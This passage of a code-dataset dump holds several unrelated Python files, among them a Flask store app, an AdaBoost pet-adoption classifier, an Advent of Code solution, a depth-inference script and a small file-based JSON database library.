print(\"Marca:\" + brand)\n        print(\"Presentación:\" + presentation)\n        print(\"Categoria:\" + category)\n        print(\"Precio:\" + price)\n\n        # Insert the product into the database\n\n        return \"Se registró el producto exitosamente\"\n\n# Update products\n\n@app.route('/updateproduct')\ndef update_product():\n    old_name = \"Jabon de cuerpo\"\n    new_name = \"Jabon de loza\"\n    old_product = Product.query.filter_by(name=old_name).first()\n    old_product.name = new_name\n    db.session.commit()\n    return \"Actualización exitosa\"\n\n# Query products\n\n@app.route('/getproduct')\ndef get_product():\n    products = Product.query.all()\n    print(products[0].category)\n    return \"Se trajo la lista de productos\"\n\n# Delete products\n\n@app.route('/deleteproduct')\ndef delete_product():\n    product_name = \"Jabon de cuerpo\"\n    product = Product.query.filter_by(name=product_name).first()\n    db.session.delete(product)\n    db.session.commit()\n    return \"Se eliminó el producto\"\n\n\nif __name__ == \"__main__\":\n    app.run()\n\n","repo_name":"AndresUseda/Pruebatienda","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7937210384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 27 17:13:56 2019\n\n@author: xumw1\n\"\"\"\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier\nimport pandas as pd\nimport numpy as np\nimport os\n\nfrom characters import characters\nfrom sklearn.externals.six.moves import zip\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier\n\ndef use_data():\n    '''baseline'''\n    print('-------baseline--------')\n    path = '../data/train.csv'\n    \n    data, petid, labels = characters(path, explore=False)\n    X = data\n    y = labels\n    \n    \n    X_train, X_test, y_train, y_test = train_test_split(\n            X, y, random_state = 0)\n    print(\"X_train created, shape = \" + str(X_train.shape))\n    print(\"y_train created, shape = \" + str(y_train.shape))\n    \n    print(\"X_test created, shape = \" + str(X_test.shape))\n    print(\"y_test created, shape = \" + str(y_test.shape))\n    # compare between models\n    #print('SVM')\n    #clf = SVC(gamma='auto')\n    #clf.fit(X_train, y_train)    \n    #print(\"Training set score: {:.3f}\".format(clf.score(X_train, y_train)))\n    #print(\"Test set score: {:.3f}\".format(clf.score(X_test, y_test)))\n    \n    print('AdaBoost')\n    ada = AdaBoostClassifier()\n    ada.fit(X_train, y_train)\n    print(\"Training set score: {:.3f}\".format(ada.score(X_train, y_train)))\n    print(\"Test set score: {:.3f}\".format(ada.score(X_test, y_test)))\n    \n#    print('AdaBoosted Decision Trees')\n#    bdt_real = AdaBoostClassifier(\n#        DecisionTreeClassifier(max_depth=2),\n#        n_estimators=600,\n#        learning_rate=1)\n# \n#    bdt_discrete = AdaBoostClassifier(\n#        DecisionTreeClassifier(max_depth=2),\n#        n_estimators=600,\n#        learning_rate=1.5,\n#        algorithm=\"SAMME\")\n# \n#    bdt_real.fit(X_train, y_train)\n#    bdt_discrete.fit(X_train, y_train)\n# \n#    real_test_errors = []\n#    discrete_test_errors = []\n# \n#    for real_test_predict, discrete_train_predict in zip(\n#            bdt_real.staged_predict(X_test), bdt_discrete.staged_predict(X_test)):\n#        real_test_errors.append(\n#            1. - accuracy_score(real_test_predict, y_test))\n#        discrete_test_errors.append(\n#            1. 
- accuracy_score(discrete_train_predict, y_test))\n# print(\"Test set score: {:.3f}\".format(1-real_test_errors[-1]))\n \n '''prediction'''\n print('prediction')\n ada.fit(X, y)\n path_test = '../data/test.csv'\n data_predict, _, _ = characters(path_test, explore=False)\n \n X_predict = data_predict\n predict = ada.predict(X_predict)\n \n return predict\n\ndef use_explored_data():\n '''explored data'''\n print('-------revised--------')\n path = '../data/train_explore_mod.csv'\n \n data, petid, labels = characters(path, explore=True)\n X = data\n y = labels\n \n \n X_train, X_test, y_train, y_test = train_test_split(\n X, y, random_state = 42)\n print(\"X_train created, shape = \" + str(X_train.shape))\n print(\"y_train created, shape = \" + str(y_train.shape))\n \n print(\"X_test created, shape = \" + str(X_test.shape))\n print(\"y_test created, shape = \" + str(y_test.shape))\n \n # compare between models\n #print('SVM')\n #clf = SVC(gamma='auto')\n #clf.fit(X_train, y_train) \n #print(\"Training set score: {:.3f}\".format(clf.score(X_train, y_train)))\n #print(\"Test set score: {:.3f}\".format(clf.score(X_test, y_test)))\n \n print('AdaBoost')\n ada = AdaBoostClassifier()\n ada.fit(X_train, y_train)\n print(\"Training set score: {:.3f}\".format(ada.score(X_train, y_train)))\n print(\"Test set score: {:.3f}\".format(ada.score(X_test, y_test)))\n \n '''prediction'''\n print('prediction')\n ada.fit(X, y)\n path_test = '../data/test.csv'\n data_predict, _, _ = characters(path_test, explore=True)\n \n X_predict = data_predict\n predict = ada.predict(X_predict)\n \n return predict\n\nif __name__ == '__main__':\n prediction0 = use_data()\n# prediction1 = use_explored_data()\n#\n sub = pd.read_csv(os.path.join('../input/test/sample_submission.csv'))\n \n submission0 = pd.DataFrame({'PetID': sub.PetID, 'AdoptionSpeed': [int(i) for i in prediction0]})\n submission0.head()\n submission0.to_csv('../submission_tableonly.csv', index=False)\n# \n# \n# submission1 = pd.DataFrame({'PetID': sub.PetID, 'AdoptionSpeed': [int(i) for i in prediction1]})\n# submission1.head()\n# submission1.to_csv('../submission_exploretableonly.csv', index=False)\n","repo_name":"wangjinjie722/How-cute-is-my-pet","sub_path":"src/explore_statistical.py","file_name":"explore_statistical.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17848453514","text":"from typing import List\nfrom collections import Counter\n\n\ndef parse_input(filename: str) -> List[str]:\n return [line.strip() for line in open(filename).readlines()]\n\n\ndef part1(box_ids: List[str]) -> int:\n two_counts = 0\n three_counts = 0\n\n for box_id in box_ids:\n counts = Counter(box_id)\n if 2 in counts.values():\n two_counts += 1\n if 3 in counts.values():\n three_counts += 1\n return two_counts * three_counts\n\n\ndef diff_by_one(str1: str, str2: str) -> str:\n result = ''\n for i in range(len(str1)):\n if str1[i] != str2[i]:\n if result != '':\n return ''\n result = str1[:i] + str1[i + 1:]\n return result\n\n\ndef part2(box_ids: List[str]) -> str:\n for box_id in box_ids:\n for other in box_ids:\n if other == box_id:\n continue\n result = diff_by_one(box_id, other)\n if result != '':\n return result\n return ''\n\n\ndef main():\n box_ids = parse_input('input/day2.txt')\n print(f'Part 1: {part1(box_ids)}')\n print(f'Part 2: {part2(box_ids)}')\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"TessFerrandez/AdventOfCode-Python","sub_path":"2018/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"9971619555","text":"import torch\nfrom utils import *\nfrom train_resnet import *\nfrom denoise_ae import AutoEncoder\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--size', type=int, default=64, help='size of patches')\nparser.add_argument('-m', '--magnitude', type=int, default=200, help='magnitude of breakHis dataset to use')\nparser.add_argument('-bs', '--batch-size', type=int, default=512)\nparser.add_argument('-de', '--denoising_epochs', type=int, default=50)\nparser.add_argument('-re', '--resnet_epochs', type=int, default=35)\nparser.add_argument('-g', '--gpus', nargs='+', type=str, default=os.environ[\"CUDA_VISIBLE_DEVICES\"].split(sep=','),\n help='number of GPUs to use')\nparser.add_argument('-d', '--denoising', type=bool, default=True, help='number of GPUs to use')\nparser.add_argument('-p', '--save_path', type=str, default='results/', help='path to save the result files')\nparser.add_argument('-ld', '--load_dae', type=bool, default=True, help='load pretrained DAE')\nparser.add_argument('-dp', '--dae_path', type=str, default='dae10.pt', help='path to load or save DAE')\nparser.add_argument('-n', '--noise_strength', type=int, default=10)\nparser.add_argument('-c', '--n_components', type=int, default=100)\n\nargs = parser.parse_args()\nprint(args)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(args.gpus)\nprint('Using GPUs:', os.environ[\"CUDA_VISIBLE_DEVICES\"])\n\n# load data\next = str(args.size) + '_' + str(args.magnitude) + 'X.npy'\nwith open('data/'+ext, 'rb') as f:\n train = np.load(f)\n valid = np.load(f)\n test = np.load(f)\n\ntrain = DataSet(train[:,:-1].reshape(-1, args.size, args.size, 3).astype(float), train[:,-1].astype(np.long))\nvalid = DataSet(valid[:,:-1].reshape(-1, args.size, args.size, 3).astype(float), valid[:,-1].astype(np.long))\ntest = DataSet(test[:,:-1].reshape(-1, args.size, args.size, 3).astype(float), test[:,-1].astype(np.long))\n\nif args.denoising:\n train_subset = train.images[::100]\n val_subset = valid.images[::100]\n model = AutoEncoder(n_inputs=train_subset.shape[1], lr=1e-3, batch_size=512, noise_strength=args.noise_strength,\n path=args.dae_path, load_weights=False, plot=False, n_components=args.n_components)\n\n if not args.load_dae:\n model.fit(train_subset, Xd=val_subset, epochs=args.denoising_epochs)\n \n # apply denoising\n train = DataSet(model.transform(train.images).transpose(0,2,3,1), train.classes)\n valid = DataSet(model.transform(valid.images).transpose(0,2,3,1), valid.classes)\n test = DataSet(model.transform(test.images).transpose(0,2,3,1), test.classes)\n torch.cuda.empty_cache()\n \n# train classifier\ntrain_acc, test_acc, train_f1, test_f1 = train_resnet(train, valid, test, args.batch_size, args.resnet_epochs)\nsavetxt(args.save_path + str(args.size) + '_' + str(args.magnitude) + '_acc.csv',\n array([train_acc, test_acc, train_f1, test_f1]), delimiter=',')\ntorch.cuda.empty_cache()","repo_name":"rabbou/BreastCancer-DAE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39530585122","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of the SKA Tango Base project\n#\n#\n#\n\"\"\"Release information for 
ska_tango_base Python Package\"\"\"\n\nname = \"\"\"ska_tango_base\"\"\"\nversion = \"0.11.1\"\nversion_info = version.split(\".\")\ndescription = \"\"\"A set of generic base devices for SKA Telescope.\"\"\"\nauthor = \"SKA India and SARAO and CSIRO and INAF\"\nauthor_email = \"adityadange.ska at gmail.com\"\nlicense = \"\"\"BSD-3-Clause\"\"\"\nurl = \"\"\"https://www.skatelescope.org/\"\"\"\ncopyright = \"\"\"NCRA and SARAO and CSIRO and INAF\"\"\"\n","repo_name":"ska-telescope/lmc-base-classes","sub_path":"src/ska_tango_base/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"6262730943","text":"import unittest\nfrom stream_utils import Token, NUMBER, STRING, SYMBOL, OPERATOR, IDENTIFIER, KEYWORD, SPACES\nfrom tsql_tokenizr import TSQL_OPERATORS_LENGTHS, tsql_tokenize\n\n\nclass TestTsqlTokenizer(unittest.TestCase):\n def test_operator_lengths(self):\n assert TSQL_OPERATORS_LENGTHS == [2, 1]\n\n def test_number(self):\n stream = \"123\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(NUMBER, \"123\", 0, 0, 0)\n\n def test_float(self):\n stream = \"123.33\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(NUMBER, stream, 0, 0, 0)\n\n def test_string(self):\n stream = \"'abc ''123'''\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(STRING, stream, 0, 0, 0)\n\n def test_string1(self):\n stream = \"'123','abc'\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(STRING, \"'123'\", 0, 0, 0)\n assert tokens[1] == Token(SYMBOL, \",\", 5, 0, 5)\n assert tokens[2] == Token(STRING, \"'abc'\", 6, 0, 6)\n\n def test_operator(self):\n stream = \"<>\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(OPERATOR, stream, 0, 0, 0)\n\n def test_symbol(self):\n stream = \".\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(SYMBOL, stream, 0, 0, 0)\n\n def test_tb1_name(self):\n tokens = tsql_tokenize(\"tb1.name\")\n assert tokens == [\n Token(IDENTIFIER, \"tb1\", 0, 0, 0),\n Token(SYMBOL, \".\", 3, 0, 3),\n Token(IDENTIFIER, \"name\", 4, 0, 4)\n ]\n\n def test_select_keyword(self):\n tokens = tsql_tokenize(\"select\")\n assert tokens == [\n Token(KEYWORD, \"select\", 0, 0, 0)\n ]\n\n def test_select_from_table(self):\n tokens = tsql_tokenize(\"select tb1.name from customer\")\n assert tokens == [\n Token(KEYWORD, \"select\", 0, 0, 0),\n Token(SPACES, \" \", 6, 0, 6),\n Token(IDENTIFIER, \"tb1\", 7, 0, 7),\n Token(SYMBOL, \".\", 10, 0, 10),\n Token(IDENTIFIER, \"name\", 11, 0, 11),\n Token(SPACES, \" \", 15, 0, 15),\n Token(KEYWORD, \"from\", 16, 0, 16),\n Token(SPACES, \" \", 20, 0, 20),\n Token(IDENTIFIER, \"customer\", 21, 0, 21),\n ]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"flashlin/Samples","sub_path":"py_standard/tests/test_tsql_tokenizr.py","file_name":"test_tsql_tokenizr.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"39857261318","text":"\"\"\" Script for running depth inference assuming MOTS dataset structure \"\"\"\nimport logging\nimport os\nimport sys\nfrom pathlib import Path, PurePath\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nfrom IPython.core import ultratb\nfrom PIL import Image\n\nimport diw\nfrom diw.model import Model, get_vars_to_save_and_restore\n\nsys.excepthook = 
ultratb.FormattedTB(mode=\"Verbose\", color_scheme=\"Linux\", call_pdb=1)\n\n_logger = logging.getLogger(__name__)\n\n\ndef load_image(img_file):\n \"\"\"Load image from disk. Output value range: [0,255].\"\"\"\n return Image.open(img_file).convert(\"RGB\")\n\n\ndef resize_img(img, img_shape):\n \"\"\" resizes an image \"\"\"\n return img.resize(img_shape, Image.LANCZOS).convert(\"RGB\")\n\n\ndef plot_image(image, image_type=\"RGB\"):\n \"\"\" plots image with matplotlib \"\"\"\n plt.figure()\n color_map = None\n if image_type != \"RGB\":\n color_map = plt.cm.get_cmap(\"plasma\").reversed()\n plt.imshow(image, cmap=color_map)\n plt.show() # display it\n return plt\n\n\n@click.command()\n@click.option(\n \"--checkpoint_dir\",\n \"checkpoint_dir\",\n default=\"./data/checkpoints/test\",\n type=click.Path(exists=True),\n help=\"Path to the model checkpoint\",\n)\n@click.option(\n \"--data_dir\",\n \"data_dir\",\n default=\"./data/test/mots_data\",\n type=click.Path(exists=True),\n help=\"Path to MOTS data\",\n)\n@click.option(\n \"--save_img\",\n \"save_img\",\n flag_value=True,\n help=\"Flag to whether save the image of the depth (besides numpy array)\",\n)\n@click.version_option(diw.__version__)\ndef main(data_dir, checkpoint_dir, save_img):\n if save_img:\n plt.figure()\n height, width = 128, 416\n os.environ[\"TF_FORCE_GPU_ALLOW_GROWTH\"] = \"true\" # to fix CUDA bug\n inference_model = Model(\n is_training=False, batch_size=1, img_height=height, img_width=width\n )\n checkpoint = tf.train.latest_checkpoint(checkpoint_dir)\n vars_to_restore = get_vars_to_save_and_restore(checkpoint)\n saver = tf.train.Saver(vars_to_restore)\n with tf.Session() as sess:\n saver.restore(sess, checkpoint)\n sequence_paths = [p for p in Path(data_dir).glob(\"*\") if p.is_dir()]\n for seq_path in sequence_paths:\n model_name = PurePath(checkpoint_dir).parts[-1]\n (seq_path / model_name).mkdir(parents=True, exist_ok=True)\n if save_img:\n (seq_path / (model_name + \"_depth_images\")).mkdir(\n parents=True, exist_ok=True\n )\n img_paths = sorted(\n [p for p in (seq_path / \"img1\").glob(\"*\") if p.is_file()],\n key=lambda path: str(path),\n )\n for img_path in img_paths:\n img_name = img_path.parts[-1].split(\".\")[0]\n print(\"Processing sequence: {}, image: {}\".format(seq_path, img_name))\n image = load_image(str(img_path))\n image = resize_img(image, (width, height))\n image = np.array(image)\n image = image[None, ...]\n depth = inference_model.inference_depth(image, sess)\n depth = depth[0, :, :, 0]\n np.save(str(seq_path / model_name / img_name), depth)\n if save_img:\n plt.imshow(depth, plt.cm.get_cmap(\"plasma\").reversed())\n plt.savefig(\n str(seq_path / (model_name + \"_depth_images\"))\n + \"/\"\n + (img_name + \".png\")\n )\n plt.clf()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"VladimirYugay/diw","sub_path":"scripts/run_mots_depth_inference.py","file_name":"run_mots_depth_inference.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"35339443981","text":"import os,errno,hashlib,shutil,datetime,random,csv as csvm\nfrom .status import error,success,info,config_status as statusc\nfrom .functions.functions import *\nfrom .functions.subclass import subclass\nfrom .operators import *\nfrom pathlib import Path\n\nclass pi7db:\n def __init__(self,db_name,db_path=\"\"):\n self.db_np,self.recover_croupt,self.db_name,self.temp_limt = os.path.join(db_path,db_name),False,db_name,120\n 
self.config_file,self.coll_name = os.path.join(self.db_np,db_name),None\n if not os.path.exists(self.db_np):os.makedirs(self.db_np)\n if not os.path.exists(f\"{self.config_file}\"):\n self.config = {'secret-key':None,'doc_size':self.doc_size}\n writedoc(f\"{self.config_file}\",self.config)\n else:self.config={'secret-key':None,'doc_size':self.doc_size}\n self.doc_size=10000000\n self.recoverbackups()\n \n def recoverbackups(self):\n for x in extractbackups(f\"{self.db_np}\"):\n os.replace(x, x.replace('.backup',''))\n\n def __setattr__(self, name, value):\n self.__dict__[name] = value\n if name == 'recover_croupt':\n self._recover_croupt = statusc.recover_status = value\n if name == 'doc_size' and self.config:\n self.config['doc_size'] = value\n\n def __getattr__(self, attrname):\n if attrname == \"temp\":\n path=self.coll_name=os.path.join(self.db_np,attrname)\n SubClass = type(attrname,(subclass,),{'key':self.key,'config_file':self.config_file,'p_filter':self.filter,'p_sortdict':self.sortdict,'p_update':self.update,'p_trash':self.trash,'p_write':self.write,'config':self.config,'db_np':self.db_np,'db_name':self.db_name,\"temp_limt\":self.temp_limt})\n SubClass = SubClass()\n return SubClass\n \n def key(self,password):\n if isinstance(password,dict):\n if password['secret-key'] is None and self.config['secret-key'] is not None:raise ValueError(error.e6)\n else:key=password['secret-key']\n else:key = hashlib.md5(password.encode()).hexdigest()\n if self.config['secret-key'] is not None:\n if key != self.config['secret-key']:raise ValueError(error.e0)\n else:\n self.config['secret-key'] = key\n writedoc(self.config_file,self.config)\n\n def changekey(self,old_key,New_key):\n files,old_key,New_key = extractfiles(self.db_np,extract_kwargs({},self.db_name)),hashlib.md5(old_key.encode()).hexdigest(),hashlib.md5(New_key.encode()).hexdigest()\n if old_key == opendoc(self.config_file)['secret-key']:\n for x_js in files:\n writedoc(x_js,opendoc(x_js,old_key),New_key)\n writedoc(self.config_file,{'secret-key':New_key})\n else:raise ValueError(error.e1)\n\n def rename(self,coll_name,doc_name,new_name):\n path,new_path = os.path.join(self.db_np,coll_name,doc_name),os.path.join(self.db_np,coll_name,new_name)\n if os.path.exists(path):\n self.update(coll_name,doc_name,{\"cr_dc_path\":new_path})\n os.rename(path,new_path)\n return success.s5(doc_name,new_name)\n else:return error.e7(doc_name)\n\n def status(self):\n dic = {}\n for f in [f for f in os.scandir(self.db_np) if f.is_dir()]:\n doc = extractfiles(f.path,extract_kwargs({},self.db_name))\n dic[f.name] = {\"Total_Files\":len(doc),\"Doc_Name\":map(lambda f:f.split(\"/\")[-1],doc)}\n return dic \n \n def exists(self,file_name,coll_name=None,**kwargs):\n if coll_name is not None:data_files = extractfiles(f\"{self.db_np}/{coll_name}\",kwargs)\n else:data_files = extractfiles(f\"{self.db_np}\",extract_kwargs(kwargs,self.db_name))\n for x_file in data_files:\n if file_name == x_file.split('/')[-1]:\n if 'today' in kwargs and kwargs['today']==True:\n if datetime.date.today() == datetime.date.fromtimestamp(Path(x_file).stat().st_mtime):return True\n else:return False\n else:return True\n return False\n\n def write(self,coll_name,fn_dict,data=None):\n self.key(self.config)\n path = os.path.join(self.db_np,coll_name)\n if data is None and isinstance(fn_dict,dict) or all([isinstance(x,dict) for x in fn_dict]):\n if isinstance(fn_dict,list):return writenodoc(path,fn_dict,self.config)\n else:fn_dict={'unid':unid(),**fn_dict};return 
writenodoc(path,fn_dict,self.config)\n else:\n try:\n data_dict={'unid':unid(),**data}\n data_dict['cr_dc_path'] = f\"{path}/{fn_dict}\";create_coll(path)\n writedoc(data_dict['cr_dc_path'],data_dict,self.config['secret-key'])\n return success.s0(fn_dict, self.coll_name)\n except Exception as e:return error.e4\n \n def update(self,coll_name,file_name=None,data_arg=None,**kwargs):\n self.key(self.config)\n if \"where\" in kwargs:\n if isinstance(coll_name,str) and isinstance(file_name,dict):\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):updatebyfilter(self.filter(coll_name,*kwargs['where'])['data'],file_name,{**self.config,**kwargs,\"coll_name\":coll_name,\"write_func\":self.write})\n else:return updatebyfilter(self.filter(coll_name,kwargs['where'])['data'],file_name,{**self.config,**kwargs,\"coll_name\":coll_name,\"write_func\":self.write})\n if isinstance(coll_name,dict) and file_name is None:\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):updatebyfilter(self.filter(coll_name,*kwargs['where'])['data'],coll_name,{**self.config,**kwargs})\n else:return updatebyfilter(self.filter(kwargs['where'])['data'],coll_name,{**self.config,**kwargs})\n try:\n js_data=opendoc(f\"{self.db_np}/{coll_name}/{file_name}\",self.config['secret-key'])\n if isinstance(data_arg,dict):js_data=nes_update(js_data,data_arg,**kwargs)\n else:return error.e2\n writedoc(f\"{self.db_np}/{coll_name}/{file_name}\",js_data,self.config['secret-key'])\n return success.s1(1)\n except OSError as e:\n if isinstance(file_name,dict):\n if 'write' in kwargs and kwargs['write']==True:return self.write(coll_name,file_name)\n else:\n if e.errno == errno.ENOENT:return error.e3(None)\n elif e.errno == 2:\n if 'write' in kwargs and kwargs['write']==True:return self.write(coll_name,file_name,data_arg)\n else:return e\n\n def read(self,coll_name=None,file_name=None,key_name=None,**kwargs):\n self.key(self.config)\n kwargs,data_files,r_data = extract_kwargs(kwargs,self.db_name),[],{\"data\":[],\"status\":1}\n if key_name is not None:return {\"data\":opendoc(f\"{self.db_np}/{coll_name}/{file_name}\",self.config['secret-key'])[key_name],\"status\":1}\n elif file_name is not None:data_files=[f\"{self.db_np}/{coll_name}/{file_name}\"]\n elif coll_name is not None:data_files = extractfiles(f\"{self.db_np}/{coll_name}\",kwargs)\n else:data_files = extractfiles(f\"{self.db_np}\",kwargs)\n for x_file in data_files[kwargs['f_a']:kwargs['l_a']]:\n o_data = opendoc(x_file,self.config['secret-key'])\n if isinstance(o_data,list):r_data['data'].extend(o_data)\n else:r_data['data'].append(o_data)\n return r_data\n \n def trash(self,coll_name=None,file_name=None,key_name=None,**kwargs):\n self.key(self.config)\n if len(kwargs):\n if 'dropkey' in kwargs:key_name=kwargs['dropkey']\n if isinstance(coll_name,str) and 'where' in kwargs:\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):trashbyfilter(self.filter(coll_name,*kwargs['where'])['data'],key_name,self.config)\n else:trashbyfilter(self.filter(coll_name,kwargs['where'])['data'],key_name,self.config)\n return True\n if 'where' in kwargs and coll_name is None:\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):trashbyfilter(self.filter(coll_name,*kwargs['where'])['data'],key_name,self.config)\n else:trashbyfilter(self.filter(kwargs['where'])['data'],key_name,self.config)\n return True\n if key_name is not None and isinstance(key_name,set) or isinstance(key_name,dict):\n tr_data = 
opendoc(f\"{self.db_np}/{coll_name}/{file_name}\",self.config['secret-key'])\n writedoc(f\"{self.db_np}/{coll_name}/{file_name}\",nes_trash(tr_data,key_name),self.config['secret-key'])\n return success.s2(key_name,file_name)\n elif file_name is not None and isinstance(file_name,str):\n os.remove(f\"{self.db_np}/{coll_name}/{file_name}\")\n return success.s3(file_name)\n elif coll_name is not None:\n if isinstance(coll_name,str):coll_name = [coll_name]\n if 'IGNORE' in kwargs:\n if isinstance(kwargs['IGNORE'],str):kwargs['IGNORE'] = [kwargs['IGNORE']]\n for x in coll_name:\n for x_file in extractfiles(f\"{self.db_np}/{x}\",kwargs):os.remove(x_file)\n else:\n for x in coll_name:shutil.rmtree(f\"{self.db_np}/{x}\", ignore_errors=False, onerror=None)\n return success.s4(\",\".join(coll_name))\n elif coll_name is None and 'IGNORE_COLLECTION' in kwargs:\n collections = list(self.status().keys())\n if isinstance(kwargs['IGNORE_COLLECTION'],str):kwargs['IGNORE_COLLECTION'] = [kwargs['IGNORE_COLLECTION']]\n for x in kwargs['IGNORE_COLLECTION']:collections.remove(x)\n for x in collections:shutil.rmtree(f\"{self.db_np}/{x}\", ignore_errors=False, onerror=None)\n return success.s4(\",\".join(collections))\n\n def sort(self,coll_name,command_tup=None,**kwargs):\n self.key(self.config)\n un_ex_kwargs,kwargs,order = kwargs,extract_kwargs(kwargs,self.db_name),False\n if \"order\" in kwargs:order = kwargs['order']\n if isinstance(coll_name,set):all_data,command_tup=self.read(**un_ex_kwargs),coll_name\n else:all_data=self.read(coll_name,**un_ex_kwargs)\n r_data = {\"data\":all_data['data'],\"status\":1}\n if isinstance(command_tup,set):\n key_tup = \"i\"+str([[x] for x in command_tup])[1:-1].replace(', ',\"\")\n r_data['data'] = sorted(r_data['data'], key = lambda i:(exec('global s;s = %s' % key_tup),s),reverse=order)\n else: \n if isinstance(command_tup,str):r_data['data'] = sorted(r_data['data'],key = lambda i: i[command_tup],reverse=order)[kwargs['f_a']:kwargs['l_a']]\n return r_data\n\n def sortdict(self,dict_list,sort_key,**kwargs):\n kwargs,order,r_data = extract_kwargs(kwargs,self.db_name),False,{\"data\":dict_list['data'],\"status\":1}\n if \"order\" in kwargs:order = kwargs['order']\n if isinstance(sort_key,set):\n key_tup = \"i\"+str([[x] for x in sort_key])[1:-1].replace(', ',\"\")\n r_data['data'] = sorted(r_data['data'][kwargs['f_a']:kwargs['l_a']], key = lambda i:(exec('global s;s = %s' % key_tup),s),reverse=order)\n else: \n if isinstance(sort_key,str):r_data['data'][kwargs['f_a']:kwargs['l_a']] = sorted(r_data['data'],key = lambda i: i[sort_key],reverse=order)\n return r_data\n \n def filter(self,*command_tup,**kwargs):\n self.key(self.config)\n un_ex_kwargs,kwargs = kwargs,extract_kwargs(kwargs,self.db_name)\n if \"IGNORE\" in kwargs:un_ex_kwargs[\"IGNORE\"] = kwargs[\"IGNORE\"]\n if isinstance(command_tup[0],str):command_tup,all_data = list(command_tup[1:]),[command_tup[0]]\n elif 'dict' in kwargs:all_data = kwargs['dict']\n else:\n if 'IGNORE_COLLECTION' in kwargs:\n if isinstance(kwargs['IGNORE_COLLECTION'],str):kwargs['IGNORE_COLLECTION']=[kwargs['IGNORE_COLLECTION']]\n else:kwargs['IGNORE_COLLECTION']=[]\n all_data = [x for x in self.status().keys() if x not in kwargs['IGNORE_COLLECTION']]\n r_data,command_arr= {\"data\":[],'status':1},[]\n if OR in command_tup:\n for x_p in command_tup:\n if x_p != OR:command_arr.append(x_p)\n for command in command_arr:\n data_get = no_freeze_filter(self,command,all_data,kwargs,un_ex_kwargs)\n for x_l in data_get:\n for x in x_l:\n if x not in 
r_data['data']:r_data['data'].append(x)\n return r_data\n else:\n for x_L in no_freeze_filter(self,command_tup[0],all_data,kwargs,un_ex_kwargs):\n for x_r in x_L:r_data['data'].append(x_r)\n return r_data\n \n def readkey(self,coll_name=None,**kwargs):\n if not 'key' in kwargs:raise KeyError(\"Key Is Required\")\n self.key(self.config)\n r_data,kwargs = {\"data\":[],\"status\":1},extract_kwargs(kwargs,self.db_name)\n if isinstance(kwargs['key'],str):kwargs['key'] = [kwargs['key']]\n if coll_name is not None:data_files = extractfiles(f\"{self.db_np}/{coll_name}\",kwargs)\n else:data_files = extractfiles(f\"{self.db_np}\",kwargs)\n for x_file in data_files[kwargs['f_a']:kwargs['l_a']]:\n o_data = opendoc(x_file,self.config['secret-key'])\n if isinstance(o_data,list):\n for x_dict in o_data:\n dic={}\n try:\n for x in kwargs['key']:dic[x] = x_dict[x]\n except:pass\n r_data['data'].append(dic)\n else:\n dic={}\n try:\n for x in kwargs['key']:dic[x] = o_data[x]\n except:pass\n r_data['data'].append(dic)\n return r_data\n\nclass csv:\n def __init__(self,file_path=None): \n self.file_path = file_path\n \n def csv_read(self,file_path=None,**kwargs):\n if file_path is not None:self.file_path = file_path\n kwargs = extract_kwargs(kwargs,\"\")\n def checkdigit(num):\n if \"no_int\" in kwargs:return num\n else:\n if num.isdigit():return int(num)\n else:\n try:return float(num)\n except:return num\n if 'csv_str' in kwargs:csvreader = csvm.reader([x for x in kwargs['csv_str'].splitlines() if x != \"\" or x.isspace()])\n else:\n with open(self.file_path, 'r') as csvfile:\n csvreader = csvm.reader(csvfile)\n self.fields = list(filter(lambda x: x != \"\", next(csvreader)))\n rows = [row for row in csvreader]\n self.rows_num = csvreader.line_num\n data = {\"data\":[],\"status\":1}\n for row in rows[kwargs['f_a']:kwargs['l_a']]:\n if any(row):\n dic,c = {},0\n for col in row[:len(self.fields)]:\n dic[self.fields[c]] = checkdigit(col)\n c+=1\n data['data'].append(dic)\n return data\n \n def csv_filter(self,*command_tup,**kwargs):\n kwargs = extract_kwargs(kwargs,self.file_path)\n if 'dict' in kwargs:all_data=kwargs.pop('dict')['data']\n else:all_data = self.csv_read(**kwargs)['data']\n r_data,command_arr= {\"data\":[],'status':1},[]\n if OR in 